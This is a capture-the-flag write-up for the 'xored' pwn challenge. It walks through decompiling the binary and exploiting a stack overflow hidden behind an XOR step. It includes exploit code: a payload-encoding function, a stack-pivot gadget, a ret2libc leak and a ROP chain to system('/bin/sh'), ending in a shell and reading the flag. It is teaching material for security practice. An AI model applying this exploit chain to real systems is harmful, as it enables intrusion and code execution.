by StateOfLimbo for coldboots
Pwn/xored (2 solves / 494 points)
nc 30012
We are given the following files
Dockerfile reveals it runs on ubuntu:20.04, flag file is /opt/flag and we are provided with the correct version of libc. Nice! The binary is appropriately called xored.
Running checksec on the binary reveals No PIE, No Canary and Partial RELRO
Let's decompile it in Ghidra
void xorit(long mem,long key)
int i;
for (i = 0; i < 0x10; i = i + 1) {
*(byte *)(mem + i) = *(byte *)(mem + i) ^ *(byte *)(key + i % 0x10);
undefined4 main(void)
int i;
undefined local_98 [120];
size_t strlength;
char *heap_mem;
undefined4 local_c;
local_c = 0;
puts("Some people say xor encryption is not secure. That is obviously a lie.");
"What if i told you we can use TWO seperate keys for our encryption, and we keep the keys seuc re on our server? No one will ever figure that out!"
puts("EPT presents, THE SECURE(tm) XOR ENCRYPT0R!");
heap_mem = (char *)malloc(160);
printf("Enter ciphertext\n> ");
strlength = strlen(heap_mem);
for (i = 0; (ulong)(long)i <= strlength >> 4; i = i + 1) {
xorit(heap_mem + (i << 4),keys + (long)(i % 2) * 0x10);
printf("the results:\n");
return local_c;
Analysing this shows that the heap_mem buffer of max 160 bytes is xored 16 bytes a time with alternating keys. These keys are however contiguous in memory, so xoring with the entire 32 byte array works the same.
Then the 160 byte buffer is copied into a 120 byte buffer on the stack, giving us 40 bytes of overflow and probably controlling the return pointer of main(). First, however we have to xor the payload with the key to make the xorit
function unpack the intended payload in memory instead of securely encrypting
pwn template --quiet --port=30012 ./xored >
I extracted the key from Ghidra by copying as a python byte string. This is actually all printable ascii, but I didn't notice until later. Xor each byte of the buffer with the key and we should get a usable payload.
def CodeIt(payload):
key = b'\x4b\x75\x43\x4f\x4c\x63\x35\x50\x49\x48\x33\x6d\x67\x50\x36\x6e\x4a\x78\x46\x33\x44\x42\x48\x58\x62\x44\x48\x53\x71\x4d\x30\x59'
result = b''
for i in range(len(payload)):
result += int.to_bytes((payload[i] ^ key[i%32]),1,'little')
return result
(yes I'm a C programmer, can you tell? Jeg sminker ikke liket i etterkant for denne anledningen heller 🤷)
By controlling the return pointer on the stack, this should be a straight forward ret2libc. Our strategy is as follows:
- Leak a libc address from the Global Offset Table (GOT) and calculate the libc base address
- return back to main()
- build a second ROP-chain in libc, calling
. - PWND!!1
Time to test the xor function and the buffer overflow by adding this to the solve script:
io.sendafter(b'> ', CodeIt(cyclic(160)))
Starting the solve script with the following arguments to run locally, get debug log info, attach gdb and no ASLR (Address space layout randomization); meaning libc, heap and stack addresses will not be randomised. This way we can compare addresses between runs.
I set a breakpoint at the last printf and view the main functions stack after the buffer overflow
We can see that we have written 160 bytes, but only barely reached the return pointer @ 0x007fffffffe5e8
This means that there is a gap between our buffer and the end of the stack, eating away at our 40 byte overflow. It seems we only get one single jump in our ROP.
There are not many viable options in this situation. A one-gadget in libc would be nice, but we don't know the base address when running with ASLR (which the remote server has enabled in 99 of 99 cases)
Another option is to look for something that manipulates rsp
to give us additional ROP jumps. I use pwntools' ROPgadget
to check for gadgets
$ ROPgadget --binary xored | grep rsp
0x0000000000401263 : adc byte ptr [rbp - 0x3d], bl ; sub rsp, 0x50 ; ret
0x0000000000401229 : add rsp, 0x10 ; pop rbp ; ret
0x0000000000401492 : add rsp, 0xd0 ; pop rbp ; ret
0x0000000000401016 : add rsp, 8 ; ret
0x000000000040151b : cli ; sub rsp, 8 ; add rsp, 8 ; ret
0x00000000004014fd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000401011 : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret
0x000000000040151d : sub esp, 8 ; add rsp, 8 ; ret
0x0000000000401266 : sub rsp, 0x50 ; ret
0x000000000040151c : sub rsp, 8 ; add rsp, 8 ; ret
0x0000000000401266 : sub rsp, 0x50 ; ret
looks promising. this will subtract 0x50 from rsp
and actually place the stack pointer inside our buffer, meaning that we can construct our ROP chain there. (the next return pointer is always popped off rsp
) The buffer position will probably be 160-0x50 because that's the numbers we know. let's just make python figure out the actual position, I don't do math in multiple bases.
Ackhtually, let's look at the gadget in ghidra for fun and learning.
LAB_00401260 XREF[1]: 0040123f(j)
00401260 48 83 c4 10 ADD RSP,0x10
00401264 5d POP RBP
00401265 c3 RET
00401266 48 ?? 48h H
00401267 83 ?? 83h
00401268 ec ?? ECh
00401269 50 ?? 50h P
0040126a c3 ?? C3h
0040126b 00 ?? 00h
0040126c 00 ?? 00h
0040126d 00 ?? 00h
0040126e 00 ?? 00h
0040126f 00 ?? 00h
at 0x00401266 It's not even disassembled as part of a function. Surely someone hasn't put it there for us to find? Disassembling it manually in Ghidra shows indeed the same as the ROPgadget utility. You will probably not find this gadget this readily in every case! ;-)
00401266 48 83 ec 50 SUB RSP,0x50
0040126a c3 RET
Ok. So I remove the cyclic overflow and replace with this, to see if I can get the instruction pointer to land on 0xc01db0075
pivot_gadget = 0x401266
rop_pos = 160 - 0x50
payload = b'A'*rop_pos
payload += p64(0xc01db0075)
payload += b'A'*(160-8-len(payload))
payload += p64(pivot_gadget)
io.sendafter(b'> ', CodeIt(payload))
Standard stuff.. calculate our ROP position.. pad with 'A' like a normal human being!
Probably need some more padding. Let python worry about the size again. (Don't judge!)
And the last 8 bytes is the return pointer.. so it should jump inside the buffer and segfault at 0xc0ldb0075
I do the breakpoint thing again at the last printf and inspect the stack:
We should have seen a lot of AAAAAAAAAAAAAAAAAAAAAAAAAA
and/or 0x4141414141414141!
Luckily we used the DEBUG
argument, and can see that the first byte is 0x0a
which is an endline.
This has probably short circuited the input of the fgets. good times!
[DEBUG] Sent 0xa0 bytes:
00000000 0a 34 02 0e 0d 22 74 11 08 09 72 2c 26 11 77 2f __4____"t____r,_&_w/_
00000010 0b 39 07 72 05 03 09 19 23 05 09 12 30 0c 71 18 __9_r______#____0_q__
00000020 0a 34 02 0e 0d 22 74 11 08 09 72 2c 26 11 77 2f __4____"t____r,_&_w/_
00000030 0b 39 07 72 05 03 09 19 23 05 09 12 30 0c 71 18 __9_r______#____0_q__
00000040 0a 34 02 0e 0d 22 74 11 08 09 72 2c 26 11 77 2f __4____"t____r,_&_w/_
00000050 3f 78 9d 32 48 42 48 58 23 05 09 12 30 0c 71 18 _?x_2_HBHX_#____0_q__
00000060 0a 34 02 0e 0d 22 74 11 08 09 72 2c 26 11 77 2f __4____"t____r,_&_w/_
00000070 0b 39 07 72 05 03 09 19 23 05 09 12 30 0c 71 18 __9_r______#____0_q__
00000080 0a 34 02 0e 0d 22 74 11 08 09 72 2c 26 11 77 2f __4____"t____r,_&_w/_
00000090 0b 39 07 72 05 03 09 19 04 56 08 53 71 4d 30 59 __9_r_______V_S_qM0Y_
OK, so the key has some tripwires, but changing the padding to write b'\0'
instead of b'A'
yields better results.
The return pointer points to the gadget that does sub rsp, 0x50
and 0xc01db0075
is placed in the right spot. the last ret tried to set the program counter to 0xc01db0075
SUCCESS! This is as good as pwndmfs!
Ready to get going with the ret2libc, we construct the following rop-chain using pwntools and add it to the payload in place of 0xc01db0075
rop = ROP(exe)
rop.raw(rop.ret.address) #ALIGN!
If you have done ret2libc before this should look familiar. rop.puts() does the pop rdi and argument handling stuff for you, and the stack needed aligning so we put another ret and then loop around to main to get another prompt for input.
This will call puts
to output the address of printf
in libc. Knowing an address in libc and it's offset will enable us to calculate any function or gadget in libc. This is powerful stuff!
TL;DR on the stack alignment is always align the stack on 16 bytes. Unaligned stack leads to all sorts of trouble. See the educational/rip writeup for an excellent explanation why. At this point I just automatically align 6 out of 10 times!
Next we capture the address of printf
outputted by puts
. Then calculate the libc base by subtracting the print-offset in the libc ELF object.
After setting libc.address, any symbol will from now on output the actual address of the symbol.
libc = ELF('./')
io.recvuntil(b'the results:\n')
libc_leak = u64(io.recvline().strip().ljust(8, b'\0'))"printf @ {hex(libc_leak)}")
libc.address = libc_leak - libc.sym.printf"libc @ {hex(libc.address)}")
[*] printf @ 0x7ffff7e32c90
[*] libc @ 0x7ffff7dd1000
[*] Switching to interactive mode
Some people say xor encryption is not secure. That is obviously a lie.
What if i told you we can use TWO seperate keys for our encryption, and we keep the keys seucre on our server? No one will ever figure that out!
Enter ciphertext
> $
Perfect! :chefskiss:
Let's construct a second rop-chain to pop a shell. system("/bin/sh")
is all we need.
Same procedure as last time, miss Sophie?
Change the ropchain a bit, but the offsets and calculations stuff stay the same.. No problem!
rop = ROP(libc)
payload = b'\0'*(160-0x50)
payload += bytes(rop.chain())
payload += b'\0'*(160-8-len(payload))
payload += p64(pivot_gadget)
io.sendafter(b'> ', CodeIt(payload))
Instead we are greeted with
Child terminated with signal = 0xb (SIGSEGV)
The stack look horrible and garbled. What is going on?
Let's print some debug output for the payloads:
secur = CodeIt(payload)"raw 1st payload: {secur}")
io.sendafter(b'> ', secur)
[*] raw 1st payload: b'KuCOLc5PIH3mgP6nJxF3DBHXbDHSqM0YKuCOLc5PIH3mgP6nJxF3DBHXbDHSqM0YKuCOLc5PIH3mgP6nIm\x063DBHXZ\x04\x08SqM0Y\x0be\x03OLc5PSXsmgP6nZk\x063DBHXbDHSqM0YKuCOLc5PIH3mgP6nJxF3DBHX\x04V\x08SqM0Y'
[*] raw 2nd payload: b'KuCOLc5PIH3mgP6nJxF3DBHXbDHSqM0YKuCOLc5PIH3mgP6nJxF3DBHXbDHSqM0YKuCOLc5PIH3mgP6n #\xd7Wc=HX\xdf!\xe27V20Y\xdb7\xd7+k\x1c5PIH3mgP6nJxF3DBHXbDHSqM0YKuCOLc5PIH3mgP6nJxF3DBHX\x04V\x08SqM0Y'
Ok. so KuCOLc
-something-something in both cases.. that's the encoded 0-padding showing the ascii of the key. Cool..
Let's check out the xorit function by checking the input and output of the function.
Setting a breakpoint on xorit in gdb:
gef_ b xorit
Breakpoint 2 at 0x4012a4
Ok.. Input in first iteratiion looks good:
$rdi : 0x000000004052a0 _ "KuCOLc5PIH3mgP6nJxF3DBHXbDHSqM0YKuCOLc5PIH3mgP6nJx[...]"
Second iteration not so much: Foiled by a stray character in front... 'Y'
. Whyyyyyy!?
$rdi : 0x00000000405350 _ "YKuCOLc5PIH3mgP6nJxF3DBHXbDHSqM0YKuCOLc5PIH3mgP6nJ[...]"
It's only padding so by shaving off a byte at the front of the payload (killing the 'K' in 'KuCOL'), everything else should align up like before:
io.sendafter(b'> ', secur[1:])
This time we get a shell for real:
the results:
$ whoami
$ ls -la
total 52
drwxr-xr-x 1 root root 83 Oct 22 16:33 .
drwxr-xr-x 1 root root 17 Oct 22 16:33 ..
-rwxr-xr-x 1 root root 220 Feb 25 2020 .bash_logout
-rwxr-xr-x 1 root root 3771 Feb 25 2020 .bashrc
-rwxr-xr-x 1 root root 807 Feb 25 2020 .profile
-rwxrwxr-x 1 root root 17328 Oct 22 16:33 xored
-rwxrwxr-x 1 root root 18744 Oct 1 18:14 ynetd
$ cat /opt/flag